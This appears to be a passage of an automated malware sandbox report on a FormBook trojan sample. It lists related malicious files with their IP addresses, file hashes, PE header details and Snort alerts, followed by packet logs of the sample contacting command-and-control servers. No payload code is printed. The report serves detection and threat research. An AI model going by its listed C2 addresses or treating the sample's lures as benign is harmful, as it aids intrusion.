                                                                  SWIFT001411983HNK.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  DOC24457188209927.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  #U4f9b#U5e94#U6750#U6599.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  PP,Sporda.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  BORMAR SA_Cotizaci#U00f3n de producto doc.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  4LkSpeVqKR.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  PO889876.pdf.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  202139769574 Shipping Documents.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  wMqdemYyHm.exeGet hashmaliciousBrowse
                                                                  • 198.49.23.145
                                                                  d801e424_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  7824,pdf.exeGet hashmaliciousBrowse
                                                                  • 198.49.23.145
                                                                  PO_29_00412.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  DHL_S390201.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.145
                                                                  triage_dropped_file.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  Wire transfer.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  mC9LnX9aGE.exeGet hashmaliciousBrowse
                                                                  • 198.49.23.145
                                                                  4x1cYP0PFs.exeGet hashmaliciousBrowse
                                                                  • 198.49.23.145
                                                                  SO.xlsm.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  shops.myshopify.comNew_Order.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  correct invoice.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  PP,Sporda.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  Purchase Order.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  PAYMENT INSTRUCTIONS COPY.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  New Order.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  slot Charges.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  WAkePI6vWufG5Bb.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  PO09641.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  PO#6275473, Shipping.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  4LkSpeVqKR.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  PO889876.pdf.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  Il nuovo ordine e nell'elenco allegato.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  Order Euro 890,000.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  winlog.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  products order pdf .exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  REVISED ORDER.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  e9777bb4_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  NEW ORDER.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  PROFORMA INVOICE210505133444.xlsxGet hashmaliciousBrowse
                                                                  • 23.227.38.74

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  AMAZON-02US7bYDInO.rtfGet hashmaliciousBrowse
                                                                  • 52.210.171.182
                                                                  nT5pUwoJSS.dllGet hashmaliciousBrowse
                                                                  • 54.247.61.18
                                                                  1c60a1e9_by_Libranalysis.rtfGet hashmaliciousBrowse
                                                                  • 44.230.85.241
                                                                  Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                  • 18.219.49.238
                                                                  main_setup_x86x64.exeGet hashmaliciousBrowse
                                                                  • 104.192.141.1
                                                                  A6FAm1ae1j.exeGet hashmaliciousBrowse
                                                                  • 3.138.180.119
                                                                  New_Order.exeGet hashmaliciousBrowse
                                                                  • 75.2.115.196
                                                                  NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                                                  • 13.58.50.133
                                                                  YDHhjjAEFbel88t.exeGet hashmaliciousBrowse
                                                                  • 99.83.175.80
                                                                  yU7RItYEQ9kCkZE.exeGet hashmaliciousBrowse
                                                                  • 99.83.175.80
                                                                  Shipment Document BL,INV and packing List.exeGet hashmaliciousBrowse
                                                                  • 52.58.78.16
                                                                  4xPBZai06p.dllGet hashmaliciousBrowse
                                                                  • 13.225.75.73
                                                                  0OyVQNXrTo.exeGet hashmaliciousBrowse
                                                                  • 3.142.167.54
                                                                  rAd00Nae9w.dllGet hashmaliciousBrowse
                                                                  • 13.225.75.73
                                                                  DOC24457188209927.exeGet hashmaliciousBrowse
                                                                  • 13.224.193.2
                                                                  user-invoice-8488888.docGet hashmaliciousBrowse
                                                                  • 104.192.141.1
                                                                  user-invoice-8488888.docGet hashmaliciousBrowse
                                                                  • 104.192.141.1
                                                                  ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                                                                  • 13.113.228.117
                                                                  PO9448882.exeGet hashmaliciousBrowse
                                                                  • 18.219.49.238
                                                                  jjbxg8kh5X.exeGet hashmaliciousBrowse
                                                                  • 52.216.177.83
                                                                  VOODOO1USKqXtlrj1Vk.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.164
                                                                  rona.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.249
                                                                  z2xQEFs54b.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.150
                                                                  winlog.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.249
                                                                  Purchase Order.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.164
                                                                  Swift File_pdf.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.249
                                                                  Drawings.xlsmGet hashmaliciousBrowse
                                                                  • 192.64.147.164
                                                                  RE PAYMENT REMINDER - SOA - OUTSTANDING (JAN21).EXEGet hashmaliciousBrowse
                                                                  • 192.64.147.164
                                                                  990109.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.150
                                                                  Proforma Invoice.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.164
                                                                  CSq58hA6nO.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.164
                                                                  NQQWym075C.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.164
                                                                  kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.150
                                                                  https://www.dropbox.com/l/AACILqMf9nyLCBAtI7us4fP05O8j3-IIsZkGet hashmaliciousBrowse
                                                                  • 192.64.147.153
                                                                  CLOUDFLARENETUS7bYDInO.rtfGet hashmaliciousBrowse
                                                                  • 104.16.18.94
                                                                  Invoice...exeGet hashmaliciousBrowse
                                                                  • 172.67.188.154
                                                                  Tek_multiloader_5.exeGet hashmaliciousBrowse
                                                                  • 162.159.133.233
                                                                  PO 367628usa.exeGet hashmaliciousBrowse
                                                                  • 66.235.200.147
                                                                  Statement of Account April-2021.exeGet hashmaliciousBrowse
                                                                  • 104.21.19.200
                                                                  2070121SN-WS for Woosim i250MSR.pif.exeGet hashmaliciousBrowse
                                                                  • 162.159.133.233
                                                                  FACTURA COMERCIAL_________________________________________________________PDF__.exeGet hashmaliciousBrowse
                                                                  • 172.67.188.154
                                                                  Quotation.exeGet hashmaliciousBrowse
                                                                  • 162.159.130.233
                                                                  8wx078Pm3P.exeGet hashmaliciousBrowse
                                                                  • 172.67.150.158
                                                                  GUaL8Nw228.exeGet hashmaliciousBrowse
                                                                  • 104.21.30.57
                                                                  8wx078Pm3P.exeGet hashmaliciousBrowse
                                                                  • 172.67.150.158
                                                                  qn8nIbPPCO.exeGet hashmaliciousBrowse
                                                                  • 172.67.151.39
                                                                  viMLlTHg3d.exeGet hashmaliciousBrowse
                                                                  • 172.67.160.89
                                                                  8n6dlwyR8l.exeGet hashmaliciousBrowse
                                                                  • 104.21.58.140
                                                                  GUaL8Nw228.exeGet hashmaliciousBrowse
                                                                  • 104.21.30.57
                                                                  qn8nIbPPCO.exeGet hashmaliciousBrowse
                                                                  • 104.21.72.139
                                                                  viMLlTHg3d.exeGet hashmaliciousBrowse
                                                                  • 172.67.160.89
                                                                  Technical data sheet.exeGet hashmaliciousBrowse
                                                                  • 172.67.188.154
                                                                  8n6dlwyR8l.exeGet hashmaliciousBrowse
                                                                  • 172.67.160.89
                                                                  v8wtfyQr7r.exeGet hashmaliciousBrowse
                                                                  • 104.21.55.224

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\350969bc_by_Libranalysis.exe.log
                                                                  Process:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1314
                                                                  Entropy (8bit):5.350128552078965
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                  MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                  SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                  SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                  SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.871178969852065
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:350969bc_by_Libranalysis.exe
                                                                  File size:924672
                                                                  MD5:350969bc82ec33af12acf100c41eb4d1
                                                                  SHA1:f17d5fc8bad55cc2b523173b43585e9edb9154e4
                                                                  SHA256:961ac1d96eb469d4a949c18c25de7bf7d3ad79a502794b470a3505fa8b65d023
                                                                  SHA512:ae62d62e5e71b01a45322dd22eb4a5496b9a96b6443fc8759cd747695565d9e6b65f84da25b44239b65b15e8d615fa0bc8cd94a82351e6f18872d1fc6ee2c506
                                                                  SSDEEP:24576:rcM+tfU+NVmFr2wNV1KEjcZI30ziIwVU:rKgFzNjKEYOEWIwV
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!................P..............0... ...@....@.. ....................................@................................

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4e30d2
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x909C21C3 [Sun Nov 18 10:56:03 2046 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xe30800x4f.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xe40000x5b4.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xe60000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xe30640x1c.text
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xe10d80xe1200False0.910015269295data7.87688083082IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xe40000x5b40x600False0.422526041667data4.09985063561IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xe60000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_VERSION0xe40900x324data
                                                                  RT_MANIFEST0xe43c40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Version Infos

                                                                  DescriptionData
                                                                  Translation0x0000 0x04b0
                                                                  LegalCopyrightCopyright 2019
                                                                  Assembly Version1.0.0.0
                                                                  InternalNameTextInfo.exe
                                                                  FileVersion1.0.0.0
                                                                  CompanyName
                                                                  LegalTrademarks
                                                                  Comments
                                                                  ProductNameWinFormBlur
                                                                  ProductVersion1.0.0.0
                                                                  FileDescriptionWinFormBlur
                                                                  OriginalFilenameTextInfo.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  05/12/21-15:47:49.762126TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.434.102.136.180
                                                                  05/12/21-15:47:49.762126TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.434.102.136.180
                                                                  05/12/21-15:47:49.762126TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.434.102.136.180
                                                                  05/12/21-15:47:49.899209TCP1201ATTACK-RESPONSES 403 Forbidden804975234.102.136.180192.168.2.4
                                                                  05/12/21-15:48:07.924397TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4103.15.186.68
                                                                  05/12/21-15:48:07.924397TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4103.15.186.68
                                                                  05/12/21-15:48:07.924397TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4103.15.186.68
                                                                  05/12/21-15:48:24.329476TCP1201ATTACK-RESPONSES 403 Forbidden8049768185.53.177.53192.168.2.4
                                                                  05/12/21-15:48:29.463149TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.423.227.38.74
                                                                  05/12/21-15:48:29.463149TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.423.227.38.74
                                                                  05/12/21-15:48:29.463149TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.423.227.38.74
                                                                  05/12/21-15:48:29.644690TCP1201ATTACK-RESPONSES 403 Forbidden804977023.227.38.74192.168.2.4
                                                                  05/12/21-15:48:35.011543TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4192.64.147.164
                                                                  05/12/21-15:48:35.011543TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4192.64.147.164
                                                                  05/12/21-15:48:35.011543TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4192.64.147.164

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 12, 2021 15:47:49.720372915 CEST4975280192.168.2.434.102.136.180
                                                                  May 12, 2021 15:47:49.761607885 CEST804975234.102.136.180192.168.2.4
                                                                  May 12, 2021 15:47:49.761939049 CEST4975280192.168.2.434.102.136.180
                                                                  May 12, 2021 15:47:49.762125969 CEST4975280192.168.2.434.102.136.180
                                                                  May 12, 2021 15:47:49.803127050 CEST804975234.102.136.180192.168.2.4
                                                                  May 12, 2021 15:47:49.899209023 CEST804975234.102.136.180192.168.2.4
                                                                  May 12, 2021 15:47:49.899231911 CEST804975234.102.136.180192.168.2.4
                                                                  May 12, 2021 15:47:49.899401903 CEST4975280192.168.2.434.102.136.180
                                                                  May 12, 2021 15:47:49.899447918 CEST4975280192.168.2.434.102.136.180
                                                                  May 12, 2021 15:47:49.940536022 CEST804975234.102.136.180192.168.2.4
                                                                  May 12, 2021 15:47:55.323738098 CEST4976280192.168.2.4119.81.45.82
                                                                  May 12, 2021 15:47:55.530555010 CEST8049762119.81.45.82192.168.2.4
                                                                  May 12, 2021 15:47:55.530677080 CEST4976280192.168.2.4119.81.45.82
                                                                  May 12, 2021 15:47:55.530891895 CEST4976280192.168.2.4119.81.45.82
                                                                  May 12, 2021 15:47:55.737502098 CEST8049762119.81.45.82192.168.2.4
                                                                  May 12, 2021 15:47:56.787616014 CEST4976280192.168.2.4119.81.45.82
                                                                  May 12, 2021 15:47:56.996212006 CEST8049762119.81.45.82192.168.2.4
                                                                  May 12, 2021 15:47:56.996391058 CEST4976280192.168.2.4119.81.45.82
                                                                  May 12, 2021 15:48:01.872087955 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.004753113 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.004889011 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.005036116 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.137639046 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140299082 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140330076 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140355110 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140372038 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140397072 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140419006 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140440941 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140460968 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.140465021 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140486956 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140507936 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.140568018 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.140605927 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.140696049 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.272782087 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.272820950 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.272845030 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.272866011 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.272867918 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.272891045 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.272900105 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.272916079 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.272938013 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.272945881 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.272959948 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.272970915 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.272981882 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273005009 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273005962 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.273026943 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273040056 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.273050070 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273070097 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.273071051 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273097992 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273116112 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.273119926 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273139954 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273152113 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.273159981 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273179054 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:02.273180962 CEST8049763198.185.159.144192.168.2.4
                                                                  May 12, 2021 15:48:02.273216009 CEST4976380192.168.2.4198.185.159.144
                                                                  May 12, 2021 15:48:07.568507910 CEST4976480192.168.2.4103.15.186.68
                                                                  May 12, 2021 15:48:07.923923969 CEST8049764103.15.186.68192.168.2.4
                                                                  May 12, 2021 15:48:07.924217939 CEST4976480192.168.2.4103.15.186.68
                                                                  May 12, 2021 15:48:07.924396992 CEST4976480192.168.2.4103.15.186.68
                                                                  May 12, 2021 15:48:08.275038004 CEST8049764103.15.186.68192.168.2.4
                                                                  May 12, 2021 15:48:08.279015064 CEST8049764103.15.186.68192.168.2.4
                                                                  May 12, 2021 15:48:08.279042006 CEST8049764103.15.186.68192.168.2.4
                                                                  May 12, 2021 15:48:08.279299974 CEST4976480192.168.2.4103.15.186.68
                                                                  May 12, 2021 15:48:08.279356003 CEST4976480192.168.2.4103.15.186.68
                                                                  May 12, 2021 15:48:08.637468100 CEST8049764103.15.186.68192.168.2.4
                                                                  May 12, 2021 15:48:13.561913967 CEST4976580192.168.2.451.222.80.112
                                                                  May 12, 2021 15:48:13.697118998 CEST804976551.222.80.112192.168.2.4
                                                                  May 12, 2021 15:48:13.697252989 CEST4976580192.168.2.451.222.80.112
                                                                  May 12, 2021 15:48:13.697396994 CEST4976580192.168.2.451.222.80.112
                                                                  May 12, 2021 15:48:13.828573942 CEST804976551.222.80.112192.168.2.4
                                                                  May 12, 2021 15:48:13.830612898 CEST804976551.222.80.112192.168.2.4
                                                                  May 12, 2021 15:48:13.830630064 CEST804976551.222.80.112192.168.2.4
                                                                  May 12, 2021 15:48:13.831099033 CEST4976580192.168.2.451.222.80.112
                                                                  May 12, 2021 15:48:13.831171989 CEST4976580192.168.2.451.222.80.112
                                                                  May 12, 2021 15:48:13.961436033 CEST804976551.222.80.112192.168.2.4
                                                                  May 12, 2021 15:48:18.927031994 CEST4976680192.168.2.481.88.52.88
                                                                  May 12, 2021 15:48:19.007870913 CEST804976681.88.52.88192.168.2.4
                                                                  May 12, 2021 15:48:19.008023977 CEST4976680192.168.2.481.88.52.88
                                                                  May 12, 2021 15:48:19.008239031 CEST4976680192.168.2.481.88.52.88
                                                                  May 12, 2021 15:48:19.089050055 CEST804976681.88.52.88192.168.2.4
                                                                  May 12, 2021 15:48:19.092015982 CEST804976681.88.52.88192.168.2.4
                                                                  May 12, 2021 15:48:19.092034101 CEST804976681.88.52.88192.168.2.4
                                                                  May 12, 2021 15:48:19.092042923 CEST804976681.88.52.88192.168.2.4
